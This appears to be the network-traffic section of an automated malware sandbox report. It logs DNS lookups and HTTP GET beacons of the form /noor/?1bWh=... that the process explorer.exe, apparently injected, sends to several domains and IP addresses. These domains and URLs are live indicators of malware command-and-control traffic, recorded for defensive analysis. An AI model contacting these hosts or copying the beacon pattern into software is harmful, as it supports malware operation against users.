Jun 11, 2021 15:42:23.369497061 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:25.733527899 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:25.783677101 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:29.644226074 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:29.697156906 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:32.272378922 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:32.336707115 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:54.736193895 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:54.872735977 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:55.510097027 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:55.574306965 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:55.754501104 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:55.816036940 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:56.190381050 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:56.389650106 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:56.665556908 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:56.735917091 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:56.831643105 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:56.895271063 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:57.712440968 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:57.773936987 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:58.560173035 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:58.621927977 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:42:59.044015884 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:42:59.103401899 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:03.946119070 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:04.004652023 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:04.813700914 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:04.874716043 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:05.390511036 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:05.442178011 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:14.321829081 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:14.381587029 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:15.988770962 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:16.990122080 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:18.036716938 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:20.083448887 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:21.040838957 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:22.042254925 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:23.101794004 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:25.137603045 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:26.056363106 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:26.136188030 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:31.177478075 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:31.378711939 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:37.057245016 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:37.140068054 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:42.346167088 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:42.415394068 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:47.781565905 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:47.857657909 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:50.467176914 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:50.537082911 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:52.834855080 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:52.907649994 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:53.465754986 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:53.530381918 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:43:59.267298937 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:43:59.366755009 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:44:04.548671007 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:44:04.635085106 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:44:09.826103926 CEST | 49944 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:44:09.903970003 CEST | 53 | 49944 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:44:15.028630018 CEST | 63300 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:44:16.041974068 CEST | 63300 | 53 | 192.168.2.4 | 8.8.8.8
Jun 11, 2021 15:44:16.264545918 CEST | 53 | 63300 | 8.8.8.8 | 192.168.2.4
Jun 11, 2021 15:44:17.269870996 CEST | 53 | 63300 | 8.8.8.8 | 192.168.2.4

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jun 11, 2021 15:43:22.045766115 CEST | 192.168.2.4 | 8.8.8.8 | cffa | (Port unreachable) | Destination Unreachable
Jun 11, 2021 15:43:23.101996899 CEST | 192.168.2.4 | 8.8.8.8 | cffa | (Port unreachable) | Destination Unreachable
Jun 11, 2021 15:43:25.137748003 CEST | 192.168.2.4 | 8.8.8.8 | cffa | (Port unreachable) | Destination Unreachable
Jun 11, 2021 15:44:17.271176100 CEST | 192.168.2.4 | 8.8.8.8 | cff5 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 15:43:15.988770962 CEST | 192.168.2.4 | 8.8.8.8 | 0xa124 | Standard query (0) | www.tcheaptvwdmall.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:16.990122080 CEST | 192.168.2.4 | 8.8.8.8 | 0xa124 | Standard query (0) | www.tcheaptvwdmall.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:18.036716938 CEST | 192.168.2.4 | 8.8.8.8 | 0xa124 | Standard query (0) | www.tcheaptvwdmall.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:20.083448887 CEST | 192.168.2.4 | 8.8.8.8 | 0xa124 | Standard query (0) | www.tcheaptvwdmall.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:26.056363106 CEST | 192.168.2.4 | 8.8.8.8 | 0xf2fc | Standard query (0) | www.jarsofjoybylinathomas.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:31.177478075 CEST | 192.168.2.4 | 8.8.8.8 | 0xb33 | Standard query (0) | www.trueandbare.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:37.057245016 CEST | 192.168.2.4 | 8.8.8.8 | 0x45be | Standard query (0) | www.velvetlaceextensions.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:42.346167088 CEST | 192.168.2.4 | 8.8.8.8 | 0xb7c8 | Standard query (0) | www.pinnacleautism.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:47.781565905 CEST | 192.168.2.4 | 8.8.8.8 | 0x2d90 | Standard query (0) | www.scgcarriers.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:53.465754986 CEST | 192.168.2.4 | 8.8.8.8 | 0xd745 | Standard query (0) | www.customtiletables.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:59.267298937 CEST | 192.168.2.4 | 8.8.8.8 | 0xd347 | Standard query (0) | www.marryobaidanjum.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:44:04.548671007 CEST | 192.168.2.4 | 8.8.8.8 | 0x7eb6 | Standard query (0) | www.astromaritravel.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:44:09.826103926 CEST | 192.168.2.4 | 8.8.8.8 | 0x38fc | Standard query (0) | www.plafon.one | A (IP address) | IN (0x0001)
Jun 11, 2021 15:44:15.028630018 CEST | 192.168.2.4 | 8.8.8.8 | 0x7a05 | Standard query (0) | www.voyagoezy.com | A (IP address) | IN (0x0001)
Jun 11, 2021 15:44:16.041974068 CEST | 192.168.2.4 | 8.8.8.8 | 0x7a05 | Standard query (0) | www.voyagoezy.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 15:43:21.040838957 CEST | 8.8.8.8 | 192.168.2.4 | 0xa124 | Server failure (2) | www.tcheaptvwdmall.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:22.042254925 CEST | 8.8.8.8 | 192.168.2.4 | 0xa124 | Server failure (2) | www.tcheaptvwdmall.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:23.101794004 CEST | 8.8.8.8 | 192.168.2.4 | 0xa124 | Server failure (2) | www.tcheaptvwdmall.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:25.137603045 CEST | 8.8.8.8 | 192.168.2.4 | 0xa124 | Server failure (2) | www.tcheaptvwdmall.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:26.136188030 CEST | 8.8.8.8 | 192.168.2.4 | 0xf2fc | Name error (3) | www.jarsofjoybylinathomas.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:31.378711939 CEST | 8.8.8.8 | 192.168.2.4 | 0xb33 | No error (0) | www.trueandbare.com | trueandbare.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:43:31.378711939 CEST | 8.8.8.8 | 192.168.2.4 | 0xb33 | No error (0) | trueandbare.com | | 162.144.21.92 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:37.140068054 CEST | 8.8.8.8 | 192.168.2.4 | 0x45be | No error (0) | www.velvetlaceextensions.com | www124.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:43:37.140068054 CEST | 8.8.8.8 | 192.168.2.4 | 0x45be | No error (0) | www124.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:43:37.140068054 CEST | 8.8.8.8 | 192.168.2.4 | 0x45be | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:43:37.140068054 CEST | 8.8.8.8 | 192.168.2.4 | 0x45be | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:43:37.140068054 CEST | 8.8.8.8 | 192.168.2.4 | 0x45be | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:42.415394068 CEST | 8.8.8.8 | 192.168.2.4 | 0xb7c8 | No error (0) | www.pinnacleautism.com | | 74.208.236.54 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:47.857657909 CEST | 8.8.8.8 | 192.168.2.4 | 0x2d90 | No error (0) | www.scgcarriers.com | | 34.215.126.147 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:47.857657909 CEST | 8.8.8.8 | 192.168.2.4 | 0x2d90 | No error (0) | www.scgcarriers.com | | 52.27.144.245 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:47.857657909 CEST | 8.8.8.8 | 192.168.2.4 | 0x2d90 | No error (0) | www.scgcarriers.com | | 52.26.163.154 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:53.530381918 CEST | 8.8.8.8 | 192.168.2.4 | 0xd745 | No error (0) | www.customtiletables.com | | 154.201.212.113 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:59.366755009 CEST | 8.8.8.8 | 192.168.2.4 | 0xd347 | No error (0) | www.marryobaidanjum.com | target.clickfunnels.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:43:59.366755009 CEST | 8.8.8.8 | 192.168.2.4 | 0xd347 | No error (0) | target.clickfunnels.com | | 104.16.13.194 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:59.366755009 CEST | 8.8.8.8 | 192.168.2.4 | 0xd347 | No error (0) | target.clickfunnels.com | | 104.16.14.194 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:59.366755009 CEST | 8.8.8.8 | 192.168.2.4 | 0xd347 | No error (0) | target.clickfunnels.com | | 104.16.15.194 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:59.366755009 CEST | 8.8.8.8 | 192.168.2.4 | 0xd347 | No error (0) | target.clickfunnels.com | | 104.16.12.194 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:43:59.366755009 CEST | 8.8.8.8 | 192.168.2.4 | 0xd347 | No error (0) | target.clickfunnels.com | | 104.16.16.194 | A (IP address) | IN (0x0001)
Jun 11, 2021 15:44:04.635085106 CEST | 8.8.8.8 | 192.168.2.4 | 0x7eb6 | No error (0) | www.astromaritravel.com | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 15:44:04.635085106 CEST | 8.8.8.8 | 192.168.2.4 | 0x7eb6 | No error (0) | ghs.googlehosted.com | | 142.250.180.243 | A (IP address) | IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:09.903970003 CEST8.8.8.8192.168.2.40x38fcNo error (0)www.plafon.one45.87.1.159A (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:16.264545918 CEST8.8.8.8192.168.2.40x7a05Server failure (2)www.voyagoezy.comnonenoneA (IP address)IN (0x0001)
                                                                                                        Jun 11, 2021 15:44:17.269870996 CEST8.8.8.8192.168.2.40x7a05Server failure (2)www.voyagoezy.comnonenoneA (IP address)IN (0x0001)

HTTP Request Dependency Graph

• www.trueandbare.com
• www.velvetlaceextensions.com
• www.pinnacleautism.com
• www.scgcarriers.com
• www.customtiletables.com
• www.marryobaidanjum.com
• www.astromaritravel.com
• www.plafon.one

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49767 | 162.144.21.92 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 15:43:31.572282076 CEST | 7426 | OUT | GET /noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0 HTTP/1.1
    Host: www.trueandbare.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 15:43:32.045828104 CEST | 7427 | IN | HTTP/1.1 500 Internal Server Error
    Date: Fri, 11 Jun 2021 13:43:31 GMT
    Server: nginx/1.19.10
    Content-Type: text/html; charset=UTF-8
    Vary: Accept-Encoding
    X-Accel-Expires: 10800
    Connection: close
    Transfer-Encoding: chunked
    Data Ascii: 12f<br /><b>Fatal error</b>: Composer detected issues in your platform: Your Composer dependencies require a PHP version ">= 7.2.5". You are running 7.1.14. in <b>/home3/walivy0agrji/public_html/wp-content/plugins/mojo-marketplace-wp-plugin/vendor/composer/platform_check.php</b> on line <b>24</b><br />


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49768 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 15:43:37.207093000 CEST | 7428 | OUT | GET /noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0 HTTP/1.1
    Host: www.velvetlaceextensions.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 15:43:37.304081917 CEST | 7429 | IN | HTTP/1.1 301 Moved Permanently
    Date: Fri, 11 Jun 2021 13:43:37 GMT
    Content-Length: 0
    Connection: close
    location: https://www.velvetlaceextensions.com/noor?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3%2FUi7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0
    strict-transport-security: max-age=120
    x-wix-request-id: 1623419017.259388871352119909
    Age: 0
    Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
    X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViJbJpTSOylDzhXDpRcNc6B,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalikQrYGaAZBxosgzBLN+JS8WoQ0cHkvLnvmz+7b97nWc3fKEXQvQlSAkB/lstal9R8e13Bz+d7LxC9U/IJokgHI=,2UNV7KOq4oGjA5+PKsX47BxIqOBp/BcxgT00NVTD1Qk=,sqmudy1rWy5CXemzdhzS/KM53xST3ovxTqKNNNoSvJGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,m86p0LbwQP79i4nFFg3YpsiRjT1D/AzZ+xl52uw09mCCz/JW/BPqA1Fu++wQa0OVCONUzZLbexpS3PEZaUF96g==
    Cache-Control: no-cache
    X-Content-Type-Options: nosniff
    Server: Pepyaka/1.19.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49769 | 74.208.236.54 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 15:43:42.578502893 CEST | 7430 | OUT | GET /noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0 HTTP/1.1
    Host: www.pinnacleautism.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 15:43:42.745291948 CEST | 7431 | IN | HTTP/1.1 404 Not Found
    Content-Type: text/html
    Content-Length: 1364
    Connection: close
    Date: Fri, 11 Jun 2021 13:43:42 GMT
    Server: Apache
    X-Frame-Options: deny
    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"></div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.loc


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49770 | 34.215.126.147 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 15:43:48.066593885 CEST | 7433 | OUT | GET /noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0 HTTP/1.1
    Host: www.scgcarriers.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 15:43:48.276607990 CEST | 7434 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 11 Jun 2021 13:43:48 GMT
    Content-Type: text/html
    Content-Length: 1245
    Connection: close
    Set-Cookie: AWSALB=2QK7EJBKXtmcKfoi1kKMz4Kz6DDYPNTUfh2HsJ/1PMnzdLXVtOElrt2UPMDYvcvaiu4SM3PdXXTr3hc58fBispGB/GR3zfHfXWx3Vl1HzOrPhTDGRSoMNG8fuVIO; Expires=Fri, 18 Jun 2021 13:43:48 GMT; Path=/
    Set-Cookie: AWSALBCORS=2QK7EJBKXtmcKfoi1kKMz4Kz6DDYPNTUfh2HsJ/1PMnzdLXVtOElrt2UPMDYvcvaiu4SM3PdXXTr3hc58fBispGB/GR3zfHfXWx3Vl1HzOrPhTDGRSoMNG8fuVIO; Expires=Fri, 18 Jun 2021 13:43:48 GMT; Path=/; SameSite=None
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49773 | 154.201.212.113 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 15:43:53.842042923 CEST | 7454 | OUT | GET /noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0 HTTP/1.1
    Host: www.customtiletables.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49774 | 104.16.13.194 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 15:43:59.411068916 CEST | 7455 | OUT | GET /noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0 HTTP/1.1
    Host: www.marryobaidanjum.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 15:43:59.492834091 CEST | 7457 | IN | HTTP/1.1 503 Service Temporarily Unavailable
    Date: Fri, 11 Jun 2021 13:43:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Set-Cookie: __cfduid=da507f1f5bd87ac88450977c3571d365f1623419039; expires=Sun, 11-Jul-21 13:43:59 GMT; path=/; domain=.www.marryobaidanjum.com; HttpOnly; SameSite=Lax
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    cf-request-id: 0a9ce9c6d500004e8bb69cc000000001
    Set-Cookie: __cf_bm=ca42e26d5ad347e92d464f49922687ab6e108dcc-1623419039-1800-Afy8CsG58VNK7t93lSl3BXV/nrpqZ7IE4pkIReJMFx6a0BQmv4H931TJk9Pdc5FFG8ebsf+GfAw4gVy2AOeNJoQWznVFadFEoCosQYfrNrKA; path=/; expires=Fri, 11-Jun-21 14:13:59 GMT; domain=.www.marryobaidanjum.com; HttpOnly
    Server: cloudflare
    CF-RAY: 65db45848bda4e8b-FRA
    Data Ascii: 207d<!DOCTYPE HTML><html lang="en-US"><head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49775 | 142.250.180.243 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 15:44:04.701019049 CEST | 7467 | OUT | GET /noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0 HTTP/1.1
    Host: www.astromaritravel.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Jun 11, 2021 15:44:04.809139967 CEST | 7467 | IN | HTTP/1.1 301 Moved Permanently
    Location: https://travel.astromari.com
    Date: Fri, 11 Jun 2021 13:44:04 GMT
    Content-Type: text/html; charset=UTF-8
    Server: ghs
    Content-Length: 225
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Connection: close
                                                                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 76 65 6c 2e 61 73 74 72 6f 6d 61 72 69 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://travel.astromari.com">here</A>.</BODY></HTML>


Session ID: 7
Source IP: 192.168.2.4
Source Port: 49776
Destination IP: 45.87.1.159
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Jun 11, 2021 15:44:09.959887981 CEST
kBytes transferred: 7468
Direction: OUT
Data:
GET /noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0 HTTP/1.1
Host: www.plafon.one
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Jun 11, 2021 15:44:10.011770010 CEST
kBytes transferred: 7469
Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Server: nginx/1.14.2
Date: Fri, 11 Jun 2021 13:44:10 GMT
Content-Type: text/html
Content-Length: 185
Connection: close
Location: https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0
